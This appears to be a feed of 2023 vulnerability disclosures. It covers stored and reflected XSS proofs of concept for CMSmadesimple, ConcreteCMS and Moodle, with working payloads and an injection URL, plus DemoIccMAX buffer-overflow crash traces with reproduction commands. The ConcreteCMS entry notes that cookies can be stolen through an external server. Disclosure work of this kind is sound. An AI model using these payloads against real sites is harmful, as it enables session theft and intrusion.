Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the News Menu component.

**CMSmadesimple Stored XSS v2.2.18****Author: (Sergio)**

**Description:** Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title in the Content - News Menu.

**Attack Vectors:** Scripting A vulnerability in the sanitization of the entry in the Ttile of "Content - News Menu" allows injecting JavaScript code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "Content- News" section off General Menu.

We edit that Content - News Menu with the payload that we have created and see that we can inject arbitrary Javascript code in the Title field.

**XSS Payload:**

'"><svg/onload=prompt('Title')\>

In the following image you can see the embedded code that executes the payload in the main web. 

  
**Additional Information:**

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43358: GitHub - sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News: Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to

kodbox 1.44 is vulnerable to Cross Site Scripting (XSS). Customizing global HTML results in storing XSS.

\[CVE ID\]

CVE-2023-45998

\[PRODUCT\]

kodbox is a file manager for web. It is a newly designed product based on kodexplorer.

\[IVERSION\]

kodbox - V1.44

\[PROBLEM TYPE\]

Cross Site Scripting (XSS)

\[DESCRIPTION\]

Customizing global HTML results in storing XSS.

CVE-2023-45998: CVE-2023-45998

Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS v.9.2.1 allow an attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics.

**ConcreteCMS Stored XSS v.9.2.1****Author: (Sergio)**

**Description:** Multiple Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics.

**Attack Vectors:** Scripting A vulnerability in the sanitization of the entry in the Header and Footer Tracking Codes of "SEO & Statistics" allows injecting JavaScript code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "SEO & Statistics- Header and Footer Tracking Codes." section off Dashboard Menu.

**XSS Payload:**

<img src\=x:alert(alt) onerror\=eval(src) alt\='XSS Header'\>

<img src\=x:alert(alt) onerror\=eval(src) alt\='XSS Footer'\>

In the following image you can see the embedded code that executes the payload in the main web. 

We can use a payload to steal cookies and obtain them when a user logs on to the website in the two vulnerable fields.

Original session cookie.

Request captured with the external server:

  
**Additional Information:**

https://www.concretecms.com/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-44760: GitHub - sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes: Multiple Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a craf

A stored cross-site scripting (XSS) vulnerability in UVDesk Community Skeleton v1.1.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Message field when creating a ticket.

CVE-2023-37636

IBM Security Verify Governance 10.0 does not encrypt sensitive or critical information before storage or transmission.  IBM X-Force ID:  256020.

CVE-2023-33837: Security Bulletin: IBM Security Verify Governance is affected by multiple vulnerabilities

IBM Security Verify Governance 10.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  256037.

CVE-2023-33840: IBM Security Verify Governance cross-site scripting CVE-2023-33840 Vulnerability Report

A stored cross-site scripting (XSS) vulnerability in Enhancesoft osTicket v1.17.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Label input parameter when updating a custom list.

CVE-2023-27149

A stored cross-site scripting (XSS) vulnerability in the Admin panel in Enhancesoft osTicket v1.17.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Role Name parameter.

CVE-2023-27148

In International Color Consortium DemoIccMAX 79ecb74, there is an out-of-bounds read in the CIccPRMG::GetChroma function in IccProfLib/IccPrmg.cpp in libSampleICC.a.

**Stack Buffer & Global Overflow Patches by @h02332 for DemoICCMax****Summary**

There is a stack buffer overflow at the icFixXml function and there is a global buffer overflow in the CIccPRMG::GetChroma function.

**Bug 1**

There is a stack buffer overflow at the icFixXml function, which is defined in IccUtilXml.cpp at line 330. The overflow occurs on a variable named 'fix', which is defined in IccTagXml.cpp at line 337.

    Error Details:
    Error Type: Stack buffer overflow.
    File: IccUtilXml.cpp
    Function: icFixXml
    Line: 330
    Variable Affected: 'fix' (defined in IccTagXml.cpp at line 337)
    Memory Affected: Address 0x7ff7b129ad20
    

**PoC**

     ./iccToXml ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc new.xml
    iccToXml(12862,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    
    ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ff7b129ad20 at pc 0x00010f569ed9 bp 0x7ff7b129ab70 sp 0x7ff7b129ab68
    WRITE of size 1 at 0x7ff7b129ad20 thread T0
        #0 0x10f569ed8 in icFixXml(char*, char const*) IccUtilXml.cpp:330
        #1 0x10f4ff381 in CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccTagXml.cpp:353
        #2 0x10f4eb22a in CIccProfileXml::ToXmlWithBlanks(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccProfileXml.cpp:264
        #3 0x10f4e632c in CIccProfileXml::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccProfileXml.cpp:79
        #4 0x10ec6821f in main IccToXml.cpp:38
        #5 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5)
    
    Address 0x7ff7b129ad20 is located in stack of thread T0 at offset 288 in frame
        #0 0x10f4fed5f in CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) IccTagXml.cpp:336
    
      This frame has 7 object(s):
        [32, 288) 'fix' (line 337) <== Memory access at offset 288 overflows this variable
        [352, 608) 'buf' (line 338)
        [672, 928) 'data' (line 339)
        [992, 1016) 'datastr' (line 340)
        [1056, 1080) 'agg.tmp'
        [1120, 1144) 'ref.tmp' (line 351)
        [1184, 1208) 'ref.tmp45' (line 360)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow IccUtilXml.cpp:330 in icFixXml(char*, char const*)
    Shadow bytes around the buggy address:
      0x7ff7b129aa80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ab00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ab80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ac00: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x7ff7b129ad00: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00 00 00
      0x7ff7b129ad80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129ae00: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2
      0x7ff7b129ae80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129af00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ff7b129af80: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 f2
    

**Expected Output**

    ./iccToXml ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc new.xml
    XML successfully created
    

**Bug 2**

There is a global buffer overflow, that can potentially be exploited to execute arbitrary code or lead to undefined behavior.

    Error Details:
    Error Type: Global buffer overflow.
    File: IccPrmg.cpp
    Function: CIccPRMG::GetChroma
    Line: 163
    Affected Variable: 'icPRMG_Chroma' defined in IccPrmg.cpp
    Memory Affected: Address 0x000103847bf0
    

**PoC**

    ./iccRoundTrip ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc
    iccRoundTrip(12888,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    =================================================================
    ==12888==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000103847bf0 at pc 0x00010365ce45 bp 0x7ff7bd5f1a80 sp 0x7ff7bd5f1a78
    READ of size 4 at 0x000103847bf0 thread T0
        #0 0x10365ce44 in CIccPRMG::GetChroma(float, float) IccPrmg.cpp:163
        #1 0x10365cefd in CIccPRMG::InGamut(float, float, float) IccPrmg.cpp:170
        #2 0x10365d151 in CIccPRMG::InGamut(float*) IccPrmg.cpp:183
        #3 0x10365de40 in CIccPRMG::EvaluateProfile(CIccProfile*, icRenderingIntent, icXformInterp, bool) IccPrmg.cpp:240
        #4 0x10365ea4e in CIccPRMG::EvaluateProfile(char const*, icRenderingIntent, icXformInterp, bool) IccPrmg.cpp:288
        #5 0x102913176 in main iccRoundTrip.cpp:177
        #6 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5)
    
    0x000103847bf0 is located 0 bytes after global variable 'icPRMG_Chroma' defined in '/Users/xss/Downloads/DemoIccMAX-master/IccProfLib/IccPrmg.cpp' (0x103847060) of size 2960
    SUMMARY: AddressSanitizer: global-buffer-overflow IccPrmg.cpp:163 in CIccPRMG::GetChroma(float, float)
    Shadow bytes around the buggy address:
      0x000103847900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000103847b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x000103847b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]f9
      0x000103847c00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847c80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847d00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847d80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x000103847e00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    

**Expected Output**

    ./iccRoundTrip ~/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc
    iccRoundTrip(29379,0x7ff851846e80) malloc: nano zone abandoned due to inability to reserve vm space.
    Profile:          '/Users/xss/Documents/colorsync-0x10ef92785-0x10ef8f000-hoyt-03172023-baseline-poc-003333.icc'
    Rendering Intent: Relative Colorimetric
    Specified Gamut:  Not Specified
    
    Round Trip 1
    ------------
    Min DeltaE:        0.00
    Mean DeltaE:       1.46
    Max DeltaE:        7.05
    
    Max L, a, b:   32.481213, 7.808893, 7.558380
    
    Round Trip 2
    ------------
    Min DeltaE:        0.00
    Mean DeltaE:       0.64
    Max DeltaE:        2.81
    
    Max L, a, b:   39.559242, 7.503039, -29.157310
    
    PRMG Interoperability - Round Trip Results
    ------------------------------------------------------
    DE <= 1.0 (   25388):  12.6%
    DE <= 2.0 (   33627):  16.7%
    DE <= 3.0 (   36466):  18.1%
    DE <= 5.0 (   42342):  21.0%
    DE <=10.0 (   58679):  29.1%
    Total     (  201613)
    

**Build**

    cmake -DCMAKE_INSTALL_PREFIX=$HOME/.local -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS="-g -fsanitize=address -fno-omit-frame-pointer -Wall -std=c++17" ../Build/Cmake
    make
    

**Testing****OS**

    ProductName:		macOS
    ProductVersion:		14.0
    BuildVersion:		23A344
    

**Platform****Data**

Various inputs from CVE-2022-26730 and CVE-2023-32443 were used as PoC's

**Crash Reports****icFixXml(char\*, char const\*) + 410**

    Crashed Thread:        0  Dispatch queue: com.apple.main-thread
    
    Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
    Exception Codes:       KERN_INVALID_ADDRESS at 0x00007ff7b34d7000
    Exception Codes:       0x0000000000000001, 0x00007ff7b34d7000
    
    Termination Reason:    Namespace SIGNAL, Code 11 Segmentation fault: 11
    Terminating Process:   exc handler [9557]
    
    VM Region Info: 0x7ff7b34d7000 is not in any region.  Bytes after previous region: 1  Bytes before following region: 1519771648
          REGION TYPE                    START - END         [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
          Stack                    7ff7b2cd7000-7ff7b34d7000 [ 8192K] rw-/rwx SM=SHM  thread 0
    --->  GAP OF 0x5a95e000 BYTES
          unused __TEXT            7ff80de35000-7ff80de9d000 [  416K] r-x/r-x SM=COW  ...ed lib __TEXT
    
    Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
    0   iccToXml                      	       0x10cadb4fa icFixXml(char*, char const*) + 410
    1   iccToXml                      	       0x10ca90027 CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) + 1431
    2   ???                           	0x6161616161616161 ???
    
    
    Thread 0 crashed with X86 Thread State (64-bit):
      rax: 0x00007ff7b34d7000  rbx: 0x000000010d301bf0  rcx: 0x0000000000000061  rdx: 0x00007ff7b34d7001
      rdi: 0x00007ff7b34d6e62  rsi: 0x00007ff7b34d6e68  rbp: 0x00007ff7b34d4310  rsp: 0x00007ff7b34d42b0
       r8: 0x0000000000000006   r9: 0x0000000000000000  r10: 0x000000000000000d  r11: 0x00007ff6a68674fd
      r12: 0x00007ff7b34d6600  r13: 0x0000000000000000  r14: 0x000000010ca2b650  r15: 0x00007ff7b34d6780
      rip: 0x000000010cadb4fa  rfl: 0x0000000000010202  cr2: 0x00007ff7b34d7000
      
    Logical CPU:     0
    Error Code:      0x00000006 (no mapping for user data write)
    Trap Number:     14
    
    Thread 0 instruction stream:
      44 19 00 e8 42 52 17 00-48 8b 75 e8 48 81 c6 04  D...BR..H.u.H...
      00 00 00 48 89 75 e8 48-89 45 a8 e9 42 00 00 00  ...H.u.H.E..B...
      48 8b 7d e8 48 8d 35 ac-44 19 00 e8 1a 52 17 00  H.}.H.5.D....R..
      48 8b 75 e8 48 81 c6 04-00 00 00 48 89 75 e8 48  H.u.H......H.u.H
      89 45 a0 e9 1a 00 00 00-48 8b 45 f0 8a 08 48 8b  .E......H.E...H.
      45 e8 48 89 c2 48 81 c2-01 00 00 00 48 89 55 e8  E.H..H......H.U.
     [88]08 48 8b 45 f0 48 05-01 00 00 00 48 89 45 f0  ..H.E.H.....H.E.	<==
      e9 69 fe ff ff 48 8b 45-e8 c6 00 00 48 8b 45 f8  .i...H.E....H.E.
      48 83 c4 60 5d c3 55 48-89 e5 48 83 ec 20 48 89  H..`].UH..H.. H.
      7d f8 48 89 75 f0 89 55-ec 48 8b 7d f8 48 8b 75  }.H.u..U.H.}.H.u
      f0 48 63 55 ec e8 ac f0-ff ff 48 8b 7d f8 88 45  .HcU......H.}..E
      eb e8 76 33 17 00 48 83-c4 20 5d c3 66 2e 0f 1f  ..v3..H.. ].f...
    

**CIccPRMG::GetChroma(float, float) + 1093 (IccPrmg.cpp:163)**

    Crashed Thread:        0  Dispatch queue: com.apple.main-thread
    
    Exception Type:        EXC_CRASH (SIGABRT)
    Exception Codes:       0x0000000000000000, 0x0000000000000000
    
    Termination Reason:    Namespace SIGNAL, Code 6 Abort trap: 6
    Terminating Process:   iccRoundTrip [12888]
    
    Application Specific Information:
    abort() called
    
    
    Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
    0   libsystem_kernel.dylib        	    0x7ff80e2357a6 __pthread_kill + 10
    1   libsystem_pthread.dylib       	    0x7ff80e26df30 pthread_kill + 262
    2   libsystem_c.dylib             	    0x7ff80e18ca4d abort + 126
    3   libclang_rt.asan_osx_dynamic.dylib	       0x103b39516 __sanitizer::Abort() + 70
    4   libclang_rt.asan_osx_dynamic.dylib	       0x103b38c74 __sanitizer::Die() + 196
    5   libclang_rt.asan_osx_dynamic.dylib	       0x103b1cf2a __asan::ScopedInErrorReport::~ScopedInErrorReport() + 1178
    6   libclang_rt.asan_osx_dynamic.dylib	       0x103b1c1dd __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) + 1773
    7   libclang_rt.asan_osx_dynamic.dylib	       0x103b1d448 __asan_report_load4 + 40
    8   libIccProfLib2.2.1.15.dylib   	       0x10365ce45 CIccPRMG::GetChroma(float, float) + 1093 (IccPrmg.cpp:163)
    9   libIccProfLib2.2.1.15.dylib   	       0x10365cefe CIccPRMG::InGamut(float, float, float) + 46 (IccPrmg.cpp:170)
    10  libIccProfLib2.2.1.15.dylib   	       0x10365d152 CIccPRMG::InGamut(float*) + 498 (IccPrmg.cpp:183)
    11  libIccProfLib2.2.1.15.dylib   	       0x10365de41 CIccPRMG::EvaluateProfile(CIccProfile*, icRenderingIntent, icXformInterp, bool) + 3169 (IccPrmg.cpp:240)
    12  libIccProfLib2.2.1.15.dylib   	       0x10365ea4f CIccPRMG::EvaluateProfile(char const*, icRenderingIntent, icXformInterp, bool) + 111 (IccPrmg.cpp:288)
    13  iccRoundTrip                  	       0x102913177 main + 1063 (iccRoundTrip.cpp:177)
    14  dyld                          	    0x7ff80dee53a6 start + 1942
    
    
    Thread 0 crashed with X86 Thread State (64-bit):
      rax: 0x0000000000000000  rbx: 0x0000000000000006  rcx: 0x00007ff7bd5f0ce8  rdx: 0x0000000000000000
      rdi: 0x0000000000000103  rsi: 0x0000000000000006  rbp: 0x00007ff7bd5f0d10  rsp: 0x00007ff7bd5f0ce8
       r8: 0x00001ffef7abe1a0   r9: 0x0000000000000000  r10: 0x0000000000000000  r11: 0x0000000000000246
      r12: 0x0000000000000103  r13: 0x2000000000000000  r14: 0x00007ff851846e80  r15: 0x0000000000000016
      rip: 0x00007ff80e2357a6  rfl: 0x0000000000000246  cr2: 0x0000000103ac44b0
      
    Logical CPU:     0
    Error Code:      0x02000148 
    Trap Number:     133
    
    
    Binary Images:
           0x1034bb000 -        0x103836fff libIccProfLib2.2.1.15.dylib (*) <f2dc6eae-a665-30af-bc63-7f6b8c876dad> /Users/USER/Downloads/*/libIccProfLib2.2.1.15.dylib
           0x103a37000 -        0x103b66fff libclang_rt.asan_osx_dynamic.dylib (*) <b5a35b2f-2e39-33dc-88c4-cd4db0ffc80b> /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/15.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib
           0x10290d000 -        0x102914fff iccRoundTrip (*) <a4db0180-b77f-39cc-bc80-71c3e8b6bbb3> /Users/USER/Downloads/*/iccRoundTrip
        0x7ff80e22d000 -     0x7ff80e267ff7 libsystem_kernel.dylib (*) <3690c1fc-599f-39ff-bbdb-85422e9a996c> /usr/lib/system/libsystem_kernel.dylib
        0x7ff80e268000 -     0x7ff80e273fff libsystem_pthread.dylib (*) <33c43114-85f0-3f32-86d7-8e6a2403d38c> /usr/lib/system/libsystem_pthread.dylib
        0x7ff80e10d000 -     0x7ff80e194fff libsystem_c.dylib (*) <3e9a5bfa-50c0-3a96-9291-4826c62d1182> /usr/lib/system/libsystem_c.dylib
        0x7ff80dedf000 -     0x7ff80df7b2ff dyld (*) <1289b60a-4980-342d-b1a4-250bbee392f1> /usr/lib/dyld
                   0x0 - 0xffffffffffffffff ??? (*) <00000000-0000-0000-0000-000000000000> ???
    
    

**Caveat: Opening Malicious ICC Color Profiles may result in Remote Code Execution in the context of the User**

CVE-2023-46603: Patches for stack buffer overflow at the icFixXml and global buffer overflow in the CIccPRMG::GetChroma functions by xsscx · Pull Request #53 · InternationalColorConsortium/DemoIccMAX

Moodle version 4.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: Moodle 4.3 Reflected XSS # Date: 21/10/2023# Exploit Author: tmrswrr# Vendor Homepage: https://moodle.org/# Software Demo: https://school.moodledemo.net/# Version: 4.3# Tested on: Linux Vulnerability Details======================Steps :1. Log in to the application with the given credentials > USER: teacher PASS: moodle2. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=3. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r34. When click this url "https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3"5. You will be see alert button

Tag

#xss